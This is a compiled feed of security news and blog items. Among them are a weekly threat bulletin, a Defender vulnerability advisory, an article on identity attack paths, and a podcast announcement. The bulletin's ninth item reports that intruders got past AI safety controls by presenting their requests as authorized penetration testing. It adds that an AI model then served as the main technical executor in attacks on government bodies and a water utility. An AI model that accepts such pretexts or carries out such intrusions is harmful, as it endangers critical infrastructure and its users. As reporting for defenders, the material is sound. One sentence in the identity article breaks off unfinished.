Announcing our new podcast: the Citrix AI Hotsheet

My Citrix colleague Dave Brear and I just launched a podcast about the future of EUC and how AI is entering the enterprise workspace. We’re calling it the Citrix AI Hotsheet, where we pull together the most relevant conversations on what’s actually happening with enterprise AI in the real world.

Dave and I have both been working in large enterprise IT environments for decades. This is not an AI hype podcast where enthusiastic AI accelerationists talk about how easy it is to vibe code your way to utopia and how we’ll all be unemployed by next year. We have been working a collective 50 years and understand how enterprises really work, how change actually happens, and what it takes to safely deliver and secure the work environment for banks, hospitals, manufacturers, and governments.

That said, we also understand how humans work. Rank-and-file knowledge workers are finding their own ways to use AI tools (whether sanctioned by IT or not), while large enterprises struggle to balance security and governance needs from IT, workers’ desires and fears about AI, and their CEO’s desire to be “AI first” while also keeping the business running.

This is the world Dave and I live in and the world we cover in this podcast.

I come from a futurist’s perspective (where are things going), and Dave from an architect’s (what are customers dealing with today).

You can find the Citrix AI Hotlist wherever you get your podcasts from:

Reach out if it’s not on your platform of choice, and we’ll add it. We record video for those who want it, but the show is designed for audio podcast listeners, so watching the video is not necessary.

Our first episode is also now available.

Episode 1: AI agents, second brains, and the enterprise AI gap

In the first episode, I make the case that AI is going to enter the enterprise by using the same desktops and applications human workers already use. (There’s no way enterprises are rebuilding everything from scratch.) We dig into computer-using agents (CUAs), why they’ve been painfully slow, and a recent research paper that shows how semantic primitives instead of screenshots can cut token consumption by 80%.

Then Dave introduces “context vaults” (what I’ve been calling “second brains”) and why they are already changing how knowledge workers work, even though most enterprises can’t see it happening.

We close by discussing how we connected our two second brains via MCP so we can bounce ideas off each other’s AI directly. (In fact we both publish our second brains at davebrear.ai and brianmadden.ai, so you can try this yourself. Click either link for details. You can connect them to whatever chatbot you use with just a few clicks!)

We’re including full transcripts with every episode so you can feed them into your own AI tools.

Dave and I both added the transcript to our public second brains, so you can chat with your AI about it, or reach out to us on LinkedIn to discuss this episode or suggest topics for future ones.

Find Episode 1 here:

from Citrix Blogs https://ift.tt/MJZOmht
via IFTTT

ThreatsDay Bulletin: Linux Rootkits, Router 0-Day, AI Intrusions, Scam Kits and 25 New Stories

This week starts small.

A token leaks. A bad package slips in. A login trick works. An old tool shows up again. At first, it feels like the usual mess. Then you see the pattern: attackers are not always breaking in. They are using the parts we already trust.

That is what makes it worrying. The danger is in normal things now - updates, apps, cloud buttons, support chats, trusted accounts. AI does not make the attacks magic. It just helps people try more things, faster.

Here's what showed up this week.

1. 47 zero-days exposed

   The Pwn2Own Berlin 2026 hacking contest has concluded, with security researchers collecting $1,298,250 in rewards after exploiting 47 zero-day flaws in various products from Windows, Linux, VMware, and NVIDIA. DEVCORE won the event with 50.5 Master of Pwn points and $505,000 in rewards throughout the three-day contest after hacking Microsoft SharePoint, Microsoft Exchange, Microsoft Edge, and Windows 11. STARLabs SG and Out Of Bounds followed with $242,500 (25 points) and $95,750 (12.75 points).

2. Agentic AI security warning

   The U.K. National Cyber Security Centre (NCSC) has released new guidance for organizations to implement adequate security controls when rolling out agentic artificial intelligence (AI) tools in enterprise environments. "If an agent is over-privileged or poorly designed, a single failure can quickly become a serious incident," NCSC said. "It is crucial, therefore, to think before you deploy."

3. Signal alternative pushed

   The Polish government is urging public officials and "entities within the National Cybersecurity System" to stop using Signal, instead directing them to use an encrypted messenger called mSzyfr developed by a leading Polish research organization, citing social engineering attacks orchestrated by advanced persistent threat (APT) groups. The development comes as multiple governments have warned of a rise in social engineering attacks, including efforts that involve threat actors impersonating Signal support, to take control of victims' accounts.

4. Fraud suspects unmasked

   The Dutch police said the identity of 74 of 100 suspects has been unmasked following the launch of an initiative called Game Over?! that displays blurred photos of 100 suspected fraudsters on billboards at various public places, as well as in television and online advertisements, giving the criminals two weeks to surrender before the images are unblurred. Of these, 34 suspects voluntarily reported to authorities, while the remaining suspects were identified through information provided by the public. The youngest suspect is only 14, and the oldest is 42 years old. Game Over?! was launched in March 2026.

5. Espionage admission

   U.S President Donald Trump said he and Chinese President Xi Jinping discussed cyber attacks and espionage activities carried out by both nations during the bilateral meetings last week. "They're talking about the spying. Well, we do it too," Trump said during his return flight to the U.S. "We spy like hell on them too," adding "I told him, 'we do a lot of stuff to you that you don't know about and you're doing things to us that we probably do know about.'" While Trump did not elaborate on the attacks carried out against China, the acknowledgement comes as China has been accused of conducting sweeping intrusions into U.S. networks.

6. Ransomware hits Korea

   The ransomware family known as Gunra has targeted five South Korean companies since it was first discovered in April 2025, S2W said. "When Gunra ransomware was first discovered, it utilized Conti-based ransomware," the South Korean security vendor noted. "However, after transitioning to a RaaS (Ransomware-as-a-Service) model, the group developed and utilized its own ransomware." As of March 2026, the group has claimed 32 victims.

7. Composer token leak

   Composer, a dependency manager for the PHP programming language, has urged its users to update Composer to version 2.9.8 or 2.2.28 (LTS). "The new releases fix a vulnerability where Composer leaks the full contents of GitHub Actions issued GITHUB_TOKEN's or GitHub App installation tokens to the GitHub Actions logs," Composer said. The vulnerability has been assigned the CVE identifier CVE-2026-45793 (CVSS score: 7.5). The development came after GitHub introduced a new format for these tokens as of late last month. "The new format, including a - (hyphen) fails Composer's validation and leads to disclosure of the GITHUB_TOKEN in logs," Composer said. As workarounds, it's advised to disable any GitHub Actions workflow that runs Composer commands until Composer has been updated.

8. Linux rootkit persists

   In July 2022, cybersecurity firm Intezer detailed a Linux malware named OrBit that implements advanced evasion techniques, gains persistence on the machine by hooking key functions, provides the threat actors with remote access capabilities over SSH, harvests credentials, and logs TTY commands. Nearly four years later, several new artifacts of the userland rootkit have been identified, indicating that the malware is being actively refined and maintained by its operators. "We discovered two parallel lineages: a full-featured 'Lineage A' build that tracks closely with the 2022 original, and a lite 'Lineage B' fork that drops entire capability domains (PAM, pcap, TCP-port hiding) in exchange for a smaller footprint," researcher Nicole Fishbein said. "Along the way, the operators rotate XOR keys, shuffle install paths, swap backdoor credentials, add auditd-evasion hooks, and eventually bolt on a service-side PAM impersonation primitive." OrBit has been put to use by Blockade Spider, a cybercrime group running Embargo ransomware campaigns. It's assessed that OrBit is a fork of an open-source rootkit called Medusa, which first publicly surfaced in December 2022. "Based on this information, there are two options: either the Medusa author published a privately-circulated rootkit source that had already been deployed operationally, or the earliest OrBit sample was built from a pre-publication snapshot of the same tree," Intezer said. "Either way, the 2022 OrBit sample and the December 2022 Medusa source tree are the same codebase. This suggests that the backdoor was created before its public release and has since been selectively forked, configured, and redeployed by multiple operators over four years."

9. AI-driven intrusions surge

   Two emerging campaigns, dubbed SHADOW-AETHER-040 and SHADOW-AETHER-064, have independently deployed agentic AI with "strikingly similar tactics" to facilitate intrusion operations against governments and financial organizations in Latin America. "Both campaigns established traffic tunnels to victim systems, enabling AI agents to conduct malicious attacks directly into victim internal network environments via ProxyChains and SSH," Trend Micro said. "The AI agents dynamically generated multiple hacking tools and scripts, rather than relying on pre-built hacking tools. This reduced the likelihood of detection by traditional security solutions that rely on known tool signatures." The two activity clusters are said to be the work of separate entities. The attackers bypassed AI safety controls by framing their requests as authorized penetration testing and red teaming exercises. Undertaken by a Spanish-speaking threat actor, SHADOW-AETHER-040 has compromised six government entities in Mexico between December 27, 2025, and January 4, 2026. This activity is consistent with Gambit Security's report about large-scale compromise of multiple Mexican government organizations between December 2025 and February 2026 by an unknown adversary using Anthropic's Claude and OpenAI's GPT AI models to carry out the intrusion activities. According to Dragos, which is tracking the activity as TAT26-12, one of these attacks targeted a municipal water and drainage utility in January 2026, leading to an unsuccessful attempt to breach its operational technology environment. "Claude acted as the primary technical executor and independently identified the OT environment's relevance to critical infrastructure, assessed its potential as a crown jewel asset, and investigated possible access pathways to breach the IT-OT boundary," Dragos said. The second campaign, linked to a Portuguese-speaking hacking crew named SHADOW-AETHER-064, has been active since April and has singled out financial organizations in Brazil. The findings show how commercial AI tools are compressing the traditional attack kill chain, accelerating tasks like reconnaissance and exploit development that historically required significant time and operator expertise. Like in the case of VoidLink, while the tools assembled for these attacks may not be particularly sophisticated or novel, the speed at which AI models generate and improve upon them is operationally significant, essentially collapsing what would have taken days or weeks of manual development effort into hours.

10. Mythos intel sharing expands

    According to the Wall Street Journal, Anthropic has begun letting users of its Mythos AI model share cybersecurity threats with others who may face similar vulnerabilities. "Last week, Anthropic began telling the companies they could share information about cyber threats and Mythos findings with other entities as long as it was done responsibly," a spokesperson for the company was quoted as saying. "As the program has matured, we've adapted them to ensure key information can be shared broadly - including outside the program - for maximum defensive impact." The development comes as Cloudflare said Mythos is a "real step forward" and is capable of chaining "small attack primitives together into a working exploit." It's also equipped to find vulnerabilities and prove they are exploitable. The web infrastructure and security company also said it has designed a multi-stage vulnerability discovery harness to scan codebases across "runtime, edge data path, protocol stack, control plane, and the open-source projects we depend on." Just like Microsoft's MDASH, different agents handle different responsibilities: "hunter" agents identify candidate vulnerabilities, others argue for or against their exploitability, while a deduplication stage collapses findings that share the same root cause. A tracer agent checks whether attacker-controlled input actually reaches the bug from outside the system, while a final "reporting" agent writes a structured report.

11. Calls now encrypted

    Discord has announced that all voice and video calls through the communication platform are now protected by default with end-to-end encryption (E2EE). The solution is powered by the DAVE protocol. "The DAVE protocol is open, and the implementation is open-source," Discord said. "As of early March 2026, every voice and video call on Discord, whether in DMs, group DMs, voice channels, or Go Live streams, is end-to-end encrypted by default." Discord said there are no plans to extend it to text messages. "Many of the features people use on Discord were built on the assumption that text isn't end-to-end encrypted, and rebuilding them to work with encryption is a meaningful engineering challenge," it added.

12. Azure identities abused

    Microsoft has shed light on a "methodical, sophisticated, and multi-layered attack" orchestrated by Storm-2949 with an aim to exfiltrate sensitive data from an unnamed organization's high-value assets. The attack, which is notable for abusing Microsoft's Self-Service Password Reset (SSPR) process to trick the target into completing multi-factor authentication (MFA) prompts, led to the exfiltration of data from Microsoft 365 applications, file-hosting services, and Azure-hosted production environments. The social engineering attack targeted IT personnel and senior leadership so as to compromise their identities for post-compromise actions. The attacker is also said to have conducted discovery activities, installed ScreenConnect, and attempted to disable Microsoft Defender Antivirus protections. "Storm-2949 didn't rely on traditional malware and other on-premises tactics, techniques, and procedures (TTPs)," Microsoft said. "Instead, they leveraged legitimate cloud and Azure management features to gain control-plane and data-plane access, which they then used to execute code remotely on VMs, and access sensitive cloud resources such as Key Vaults and storage accounts, among others. These activities allowed them to move laterally across cloud and endpoint environments while blending into expected administrative behavior."
13. App Store fraud blocked

    Apple said its App Store stopped over $2.2 billion in potentially fraudulent transactions and rejected over 2 million problematic app submissions in 2025. "Last year, Apple's systems also successfully rejected 1.1 billion fraudulent customer account creations - blocking bad actors at the outset - and deactivated an additional 40.4 million customer accounts for fraud and abuse," Apple said. "In 2025, Apple terminated 193,000 developer accounts over fraud concerns and rejected more than 138,000 developer enrollments. To further protect users from harmful software, Apple in 2025 detected and blocked 28,000 illegitimate apps on pirate storefronts, which include malware, pornography apps, gambling apps, and pirated versions of legitimate apps from the App Store." Apple also rejected over 22,000 submissions for containing hidden or undocumented features and more than 443,000 submissions for privacy violations. In the last month alone, the iPhone maker said it prevented 2.9 million attempts to install or launch apps distributed illicitly outside the App Store or approved alternative app marketplaces.

14. Fraud routing exposed

    Two U.S. nationals, CEO Adam Young, 42, of Miami, and Harrison Gevirtz, 33, of Las Vegas, have pleaded guilty to running a business that provided services to customers engaged in widespread telemarketing and tech-support fraud schemes targeting victims across the country. The services, which included telephone numbers, call routing services, call tracking, and call forwarding services, were offered to customers who engaged in tech-support fraud schemes. They are scheduled to be sentenced on June 16, 2026. The investigation also led to the conviction of five India-based telemarketing fraudsters and a former employee of their call routing company (Sahil Narang, Chirag Sachdeva, Abrar Anjum, Manish Kumar, and Jagmeet Singh Virk) for targeting and defrauding Americans. "Call centers based in India utilized Young and Gervitz's business to route their 'tech fraud' scheme calls and, in some instances, advised those fraudsters on methods intended to reduce complaints and prevent account terminations," the U.S. Justice Department said. The schemes used deceptive pop-up messages to falsely convince users that their computers had been infected with viruses or malware, urging them to contact a number to address the issue. In reality, the numbers connected the victims to call centers, where they were duped into paying hundreds of dollars for unnecessary or fictitious technical-support services. In some instances, the call center agents gained remote access to victims' computers and obtained personal and financial information.

15. Linux printing RCE risk

    HP has released fixes for CVE-2026-8631 (CVSS score: 9.3), a critical heap-based buffer overflow vulnerability in HPLIP that could allow escalation of privileges and/or arbitrary code execution. "Because HPLIP is deeply integrated into the standard Linux printing architecture (CUPS), this flaw exposes millions of Linux endpoints and enterprise print servers," security researcher Mohamed Lemine Ahmed Jidou, who discovered the flaw, told The Hacker News. "An unauthenticated attacker over the network - or a low-privileged local user - can silently exploit this by simply submitting a maliciously crafted print job. Successful exploitation grants the attacker arbitrary command execution on the host machine. This allows for immediate system compromise, unauthorized access to sensitive documents passing through the print spooler, and provides a stealthy foothold for lateral movement across corporate networks."

16. Telegram accounts hijacked

    AhnLab is warning of a new Telegram-oriented smishing campaign that's designed to take control of victims' accounts and steal account information using SMS messages that claim to be about non-existent security issues. "Threat actors hijack Telegram accounts by tricking users into entering their phone numbers and login codes on phishing sites," AhnLab said. "Once an account is compromised, it can lead to personal information and chats being leaked, as well as secondary damage."

17. Premium SMS fraud

    A new sophisticated Android malware campaign dubbed Premium Deception has been observed conducting carrier billing fraud through premium SMS abuse across Malaysia, Thailand, Romania, and Croatia between March 2025 and January 2026. The activity involves more than 250 malicious applications that selectively target users based on their mobile operator, stealthily subscribing users to premium services without their knowledge or consent. Device metadata and subscription confirmations are sent to the operators via a Telegram-based exfiltration channel. "When deployed on devices with non-targeted operators, the malware employs a fallback mechanism to display benign content, thereby evading detection and maintaining persistence," Zimperium zLabs said. Three distinct malware variants have been identified, each with varying levels of sophistication. There is no evidence that these apps were circulated via the Google Play Store. Instead, the scheme relies on social media platforms like Facebook and TikTok for distribution.

18. Brazilian banking RAT

    A new Brazilian banking trojan dubbed Banana RAT has become the latest malware to target financial institutions in the region. Unlike other Latin American banking malware that are typically written in Delphi, Banana RAT is a PowerShell-only client orchestrated by a Python (FastAPI) server-side polymorphism engine. Once active, it enables operator-driven fraud through remote input control, keylogging, clipboard monitoring, screen streaming, fake overlays, and Pix QR code interception targeting Brazilian banks. It also monitors foreground window titles and serves a bogus credential harvesting overlay when a victim opens a website that matches a target list of more than 30 bank and cryptocurrency exchanges. Trend Micro, which is tracking the activity under the moniker SHADOW-WATER-063, said the design diverges "meaningfully" from the Delphi binary architecture historically associated with the banking malware ecosystem comprising Grandoreiro, Mekotio, Casbaneiro, Guildma, and CHAVECLOAK. "The Brazilian cybercrime cartels are very sophisticated and organized, and they have been a bane to the financial sector since 2000," Tom Kellermann, TrendAI's vice president of AI Security and Threat Research, said. "The RATs and rootkits they develop are on par with those we have seen from Russia. Insufficient attention is being paid to cybercrime in LATAM, and the financial sector has good reason to be concerned as something wicked comes this way."

19. DNS-backed Go backdoor

    A malicious Go module published as github.com/shopsprint/decimal has been flagged as a typosquat of the widely used github.com/shopspring/decimal arbitrary precision arithmetic library. It was first published in November 2017 and was weaponized in August 2023 when version v1.3.3 added a malicious functionality that "opens a DNS TXT record command-and-control channel to a threat actor-controlled subdomain on a free dynamic DNS provider," per Socket. Although the GitHub repository and the shopsprint owner account have since been removed, the library continues to be served by proxy.golang[.]org. The payload "polls net.LookupTXT("dnslog-cdn-images.freemyip.com") every five minutes, and sleeps on DNS failure without logging or signaling an error," researcher Kush Pandya said. "Each returned TXT value is passed directly to os/exec.Command and executed."

20. npm package hijacked

    The npm package art-template, a JavaScript template engine with about 26,000 weekly downloads, has been compromised through a maintainer account takeover to push malicious versions (from 4.13.3 through 4.13.6) designed to load external JavaScript from third-party domains. "Unauthorized code in template-web.js injects external <script> tags into any page using the browser bundle," SafeDep said. "The external domain (v3.jiathis[.]com) serves a multi-stage payload when the request includes a Referer header. The payload injects Baidu Analytics tracking on all visitors and targets iPhone users with a hidden iframe chain leading to an obfuscated JavaScript payload. The final payload is the Coruna exploit kit."

21. Malware game removed

    A malicious game distributed through Steam has been removed from Valve after it was observed profiling players' systems and communicating with external infrastructure that allows it to deploy secondary payloads. The game, titled Beyond The Dark, masqueraded as a free indie horror title on Steam. The discovery was documented by YouTuber Eric Parker.

22. Router zero-day outage

    The exploitation of a zero-day vulnerability in Huawei enterprise router software led to a nationwide telecom outage in Luxembourg on July 23, 2025, The Record reported this week. The incident disrupted mobile, landline, and emergency communications for more than three hours. The attack is said to have caused Huawei enterprise routers to enter into a continuous restart loop, crashing parts of POST Luxembourg's infrastructure. There are currently no details about the vulnerability, and it remains unclear if the issue was patched by Huawei.

23. Crypto ATM losses surge

    The U.S. Federal Bureau of Investigation (FBI) has revealed that Americans have lost over $388 million last year to scams using cryptocurrency kiosks (aka crypto ATMs or Bitcoin ATMs). "Cryptocurrency kiosks are ATM-like devices or electronic terminals that allow users to exchange cash and cryptocurrency," the FBI said. "Criminals may direct victims to send funds via cryptocurrency kiosks." The development comes as CertiK noted that physical coercion attacks (aka wrench attacks) on cryptocurrency holders rose 75% year-over-year to 72 confirmed cases worldwide and $41 million in known losses in 2025, up 44% from 2024. This year alone, 34 verified incidents have been recorded internationally, compared to 24 over the same period in 2025.

24. ICS attacks persist

    Operational technology security company Nozomi Networks said it detected 29 events between July 2025 and January 2026 that "conclusively identified as Sandworm activity." Based on data collected from customer and partner engagements, honey research, and telemetry, the activity follows a bureaucratic execution model, "peaking midweek and during post-lunch business hours, with Wednesday at approximately 2:00 PM Moscow time showing the highest alert volume." Across the dataset, 17 Sandworm-infected machines were identified across the 10 customers. These systems conducted lateral movement against 923 unique internal targets. "Despite widespread awareness and patch availability, Sandworm continues to rely on older but proven exploit chains, including EternalBlue, DoublePulsar, and WannaCry," Nozomi Networks said. "Perhaps the most critical finding: every single Sandworm-infected system produced 20 to 155 days of warning alerts prior to Sandworm activity."

25. Stego loader deployed

    A new phishing campaign has been observed using invoice-themed lures to distribute malicious archives to trigger the execution of JavaScript code, which employs environment variables to hide malicious commands and uses a steganographic loader dubbed PawsRunner to deploy the PureLogs infostealer malware. "The embedded JavaScript uses a sophisticated technique to store decoded malicious commands in environment variables, which then triggers a decrypted steganographic .NET loader," Fortinet said. "This loader retrieves the final payload by extracting encrypted data hidden within a cat image. This version of PureLogs uses extensive async/await patterns to improve task efficiency and complicate analysis." A similar campaign was detailed by Swiss Post Cybersecurity in January 2026.

26. Card dump released

    The notorious B1ack's Stash dark web carding marketplace has announced the free download of 4.6 million stolen credit card records. According to SOCRadar, the released data includes full card numbers, expiration dates, CVV2 codes, cardholder names, billing addresses, email addresses, phone numbers, and IP addresses. Of these, 4.3 million records appear to be new and usable for illicit activities. Most of the records belong to victims from the U.S., Canada, the U.K., France, and Malaysia.

27. Browser-locking scareware

    A new web-based scareware kit called CypherLoc is capable of combining "advanced evasion, aggressive browser controls, and psychological manipulation" to drive victims into calling fraudulent tech support phone numbers. Barracuda Networks said it has observed around 2.8 million attacks featuring the kit since the start of 2026. "The attack usually starts with a phishing email that directs the victim to a malicious web page through a link that is either embedded in the email body or in an attachment," Barracuda said. "The web page initially appears harmless but gradually transitions into a fully controlled scareware environment. The trigger for this transition is hidden in the web page and will only decrypt if certain conditions are met." The end result is a full-screen scareware interface that locks the browser and displays fake security messages that urge victims to contact support immediately.

28. AI phishing at scale

    New research has demonstrated that "publicly available social-media data and generative AI (GenAI) can be misused to automate and scale highly personalized, context-aware spear-phishing campaigns." Researchers from the University of Texas at Arlington and Louisiana State University, Baton Rouge, said a "small amount of public activity per target" is enough for AI models to extract interests and contextual cues that could be exploited to carry out persuasive phishing campaigns that mirror a target's style. The findings show that bad actors do not have to rely on stolen databases or extensive reconnaissance to carry out targeted phishing campaigns.

29. Legacy LOLBIN abused

    Bitdefender haș disclosed that attackers are continuing to exploit Microsoft HTML Application Host (MSHTA), a legacy utility available by default on Windows systems, for malware campaigns. "MSHTA remains a widely abused Living-off-the-Land binary (LOLBIN) despite being a legacy utility," Bitdefender said. "Attackers use it across multiple malware categories, from commodity stealers to advanced threats. Campaigns frequently rely on multi-stage, fileless execution chains involving PowerShell and HTA scripts." MSHTA has been abused in delivery chains for commodity stealers such as Lumma Stealer and Amatera, loaders such as CountLoader and Emmenhtal Loader (aka PEAKLIGHT), clipper malware, and more advanced threats like Purple Fox.

30. GovCloud secrets exposed

    A contractor for the U.S. Cybersecurity and Infrastructure Security Agency (CISA) maintained credentials to several highly privileged AWS GovCloud accounts and a large number of internal CISA systems exposed on a public GitHub repository (ironically named "Private-CISA") since November 2025. The repository was discovered by GitGuardian on May 14, 2026. It harbored 844 MB of plain-text passwords, AWS tokens, and Entra ID SAML certificates belonging to the agency. The repository has since been pulled offline following responsible disclosure. There is no evidence that any sensitive data was compromised as a result of this incident.

31. Trojanized apps cluster

    Palo Alto Networks Unit 42 said it has identified 4,000 samples across 100 unique variants associated with a threat known as TamperedChef (aka EvilAI), which involves using trojanized versions of productivity software to deliver malicious payloads using malicious ads that direct users to sites hosting the applications. "TamperedChef-style malware samples share characteristics with potentially unwanted programs (PUPs) and adware," Unit 42 said. "These include robust mechanisms to remain persistent, and end-user licensing agreements (EULAs) that attempt to legally cover the software's questionable actions. However, TamperedChef-style malware is far more stealthy than PUPs or adware, remaining dormant for weeks to months before activating. This includes continuous command and control (C2) methods enabling adversaries to retrieve additional payloads, such as information stealers, proxy tooling or remote access Trojans (RATs)." The activity has been attributed to three distinct clusters distributing malicious apps since early 2023: CL-CRI-1089 (Calendaromatic, DocuFlex, and AppSuite PDF), CL-UNK-1090 (CrystalPDF, Easy2Convert, and PDF-Ezy), and CL-UNK-1110 (JustAskJacky, GoCookMate, RocketPDFPro, ManualReaderPro). While CL-CRI-1089 appears to target credentials and deploy adware and proxy-style payloads, the motivations of the other two clusters are unknown.

That's the problem with weeks like this. Nothing feels shocking for more than five minutes, because the next thing is already waiting. A fake app here, a bad package there, a cloud trick in the middle. Same fire, new room.

Patch what matters. Watch what you trust. And do not ignore the boring alerts just because they look familiar. That is usually where the story starts.

from The Hacker News https://ift.tt/tRN0wzf
via IFTTT

Microsoft Warns of Two Actively Exploited Defender Vulnerabilities

Microsoft has disclosed that a privilege escalation and a denial-of-service flaw in Defender has come under active exploitation in the wild.

The former, tracked as CVE-2026-41091, is rated 7.8 on the CVSS scoring system. Successful exploitation of the flaw could allow an attacker to gain SYSTEM privileges.

"Improper link resolution before file access ('link following') in Microsoft Defender allows an authorized attacker to elevate privileges locally," Microsoft said in an advisory.

The second vulnerability under exploitation is CVE-2026-45498 (CVSS score: 4.0), a denial-of-service bug impacting Defender. The two vulnerabilities have been addressed in Microsoft Defender Antimalware Platform versions 1.1.26040.8 and 4.18.26040.7, respectively.

The tech giant noted that systems that have disabled Microsoft Defender are not susceptible to the vulnerability, adding that no action is required to install the update since it automatically updates malware definitions and the Microsoft Malware Protection Engine for optimal protection.

Microsoft credited five different parties with discovering and reporting the flaw, including Sibusiso, Diffract, Andrew C. Dorman (aka ACD421), Damir Moldovanov, and an anonymous researcher.

To ensure the latest version of the Microsoft Malware Protection Platform and definition updates are being actively downloaded and installed, users are recommended to follow the steps below:

• Open the Windows Security program.
• In the navigation pane, select Virus & threat protection.
• Then click on Protection Updates in the Virus & threat protection section updates.
• Select Check for updates.
• In the navigation pane, select Settings, and then select About.
• Examine the Antimalware ClientVersion number.

There are currently no details on how the vulnerabilities are being exploited in the wild. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added both of them to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the fixes by June 3, 2026.

Last week, Microsoft also disclosed that a cross-site scripting flaw impacting on-premise versions of Exchange Server (CVE-2026-42897, CVSS score: 8.1) has been weaponized in real-world attacks.

Also added to the KEV catalog on Wednesday are four other Microsoft flaws from 2008, 2009, and 2010 -

• CVE-2010-0806 - Microsoft Internet Explorer contains a use-after-free vulnerability that could allow remote attackers to execute arbitrary code.
• CVE-2010-0249 - Microsoft Internet Explorer contains a use-after-free vulnerability that could allow remote attackers to execute arbitrary code.
• CVE-2009-1537 - Microsoft DirectX contains a NULL byte overwrite vulnerability in the QuickTime Movie Parser Filter in quartz.dll in DirectShow, which could allow remote attackers to execute arbitrary code via a crafted QuickTime media file.
• CVE-2008-4250 - Microsoft Windows contains a buffer overflow vulnerability in the Windows Server Service that allows remote attackers to execute arbitrary code via a crafted RPC request.

Another vulnerability that finds a mention in the list is CVE-2009-3459, a heap-based buffer overflow vulnerability in Adobe Acrobat and Reader that could allow remote attackers to execute arbitrary code via a crafted PDF file that triggers memory corruption.

from The Hacker News https://ift.tt/d5CsWJl
via IFTTT

When Identity is the Attack Path

Consider a cached access key on a single Windows machine. It got there the way most cached credentials do - a user logged in, and the key stored itself automatically. Standard AWS behavior. No one misconfigured anything or violated a policy. Yet that single key, which was easily accessible to a minor-league attacker, could have opened a path to some 98% of entities in the company's cloud environment - nearly every critical workload the business depended on. 

This real-world exposure was caught before an attacker could use it. But the takeaway is clear: identity itself, and every permission it carries, has become the attack path.

Your environment runs on identity. Active Directory, cloud identity providers, service accounts, machine identities, and AI agents - all of these carry permissions that span systems and trust boundaries. A single stolen credential hands the attacker a legitimate identity - along with every permission attached to it. 

Despite this, most security programs still treat identity as a perimeter control - something to protect through authentication and access policies. Yet the real risk starts inside the front door. Once an attacker has a foothold, identity is what lets them advance, cross boundaries, and reach critical assets. Because identity is not a perimeter - it's a highway that runs through every layer of your environment.

In this article, we'll look at how cached credentials, excessive permissions, and forgotten role assignments can turn into attack paths across hybrid environments - and why the tools designed to catch them keep missing.

The Attack Path Runs Through Identity

The cached access key from that opening scenario is just one example of a much larger phenomenon. Across hybrid environments, identity

One Active Directory group membership that no one reviewed gives an attacker on a retail endpoint a direct path to the corporate domain. A developer SSO role provisioned for a cloud migration keeps its permissions long after the project wraps, giving anyone who compromises that identity a four-step route from developer access to production admin. What makes these real-world examples so dangerous is how they connect. That cached credential on the retail endpoint led to an overprivileged role in Active Directory, which led to a cloud workload with an attached admin policy. Together, the links in this type of identity exposure chain form a single attack path - from an initial foothold to a critical asset. 

How prevalent is this? Palo Alto found that identity weaknesses played a serious role in nearly 90% of its 2025 incident response investigations. And given the prevalence of AI agents taking on enterprise workloads, those numbers are likely to go up. SpyCloud's 2026 Identity Exposure Report flagged non-human identity theft as one of the fastest-growing categories in the criminal underground, with a third of recovered non-human credentials tied to AI tools. 

What happens when one of those non-human identities carries admin-level permissions? Consider a dev team that configures an MCP server with high-level permissions so their AI tooling can operate across systems. The AI agent using the MCP server inherits those privileges as its own identity. A vulnerability in the open-source tooling can easily hand an attacker the permissions that agent holds. From there, the path runs straight into cloud resources, databases, and production infrastructure. The credentials that make this possible are exactly the kind found circulating in criminal marketplaces by the millions.

Clearly, the threat of identity exposures is not a new one. Yet the identity tools most organizations still rely on were built to solve specific problems in isolation – and in a different threat era. 

IGA platforms manage user lifecycle - provisioning, deprovisioning, access reviews, and more. PAM solutions store privileged credentials and monitor sessions. Each of these tools does its job in isolation. But none of them can map how identity exposures chain together across endpoints, Active Directory, and cloud environments into a single exploitable route.

This is why the rates of identity-based incidents keep climbing even as security spending grows. The IBM X-Force 2026 Threat Intelligence Index found that stolen or misused credentials accounted for 32% of incidents - the second most common initial access vector. Today’s attackers really don’t need to write malware or exploits, they can just log in.

The vast majority of these identity-based exposures are entirely preventable. In fact, Palo Alto found that over 90% of the breaches its teams investigated in 2025 were enabled by exposures that existing tools should have caught. The organizations had the tools and the staff. Yet the gaps persisted because no single tool had visibility into how identity exposures chained together across environments into attack paths. 

Closing the Gap

Until security programs can connect identity, permissions, and access controls into a unified view of how an attacker actually moves, identity will remain one of the easiest ways to compromise critical assets. 

Every scenario in this article follows the same structure: a credential, permission, or role assignment that no single tool flags as dangerous creates a traversable path from a low-level foothold to a critical asset. The path only becomes visible when identity, access policies, and environment context are mapped together.

Security programs that map those connections across hybrid environments can close identity-based attack paths before an attacker chains them. Programs that keep treating identity as a perimeter problem will continue losing ground to attackers who already know it's a highway.

Note: This article was thoughtfully written and contributed for our audience by Alex Gardner, Director of Product Marketing at XM Cyber

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.

from The Hacker News https://ift.tt/l5z1g7x
via IFTTT

Securing the gaming culture of cultures

The Deputy CISO blog series is where Microsoft Deputy Chief Information Security Officers (CISOs) share their thoughts on what is most important in their respective domains. In this series, you will get practical advice, tactics to start (and stop) deploying, forward-looking commentary on where the industry is going, and more. In this article, Aaron Zollman, Vice President and Deputy CISO for Gaming at Microsoft discusses the unique challenges and rewards of securing gaming.

There are more than 500 million monthly active players¹ across Xbox consoles, PC, handheld, and more through Xbox cloud gaming. They’re the folks who come to mind when people refer to “gaming culture.” But they’re not really the whole story. Globally, more than 3 billion people engage with gaming.² The majority of these people are gamers, but the number also includes developers working for independent gaming studios, engineers supporting the Xbox platform, and the security and operations professionals that support them all.

In my role as Deputy CISO for Gaming at Microsoft, it’s this much larger, much more complex community that I have to take into account. My team and I aren’t tasked solely with protecting consoles or player accounts. We’re safeguarding intellectual property (IP), live operations, and the trust of billions of interactions. We’re also partnering on risks that range from cheating and monetization exploits to supply chain vulnerabilities and regulatory compliance for child safety and privacy.

Gaming isn’t really a single culture, but rather a culture of cultures—each with their own risk factors to account for. At the heart of gaming is the player experience—their need for seamless access, low latency, and frictionless, immersive experiences. This goes hand-in-hand with privacy and safety in a world where cyberattackers could target well-known players. But aside from those basic needs, players form their own tribes, and a diverse, global player base requires a different approach—which makes securing gaming unique. You don’t approach it like you might traditional enterprise. Studios operate with creative autonomy, platforms demand global scale and low latency, and players expect frictionless experiences. That diversity makes gaming vibrant while also creating unique security challenges.

Each culture comes with its own security risks

Let’s first take a look at the risks that most often appear with each of the overlapping cultures that make up the world of gaming:

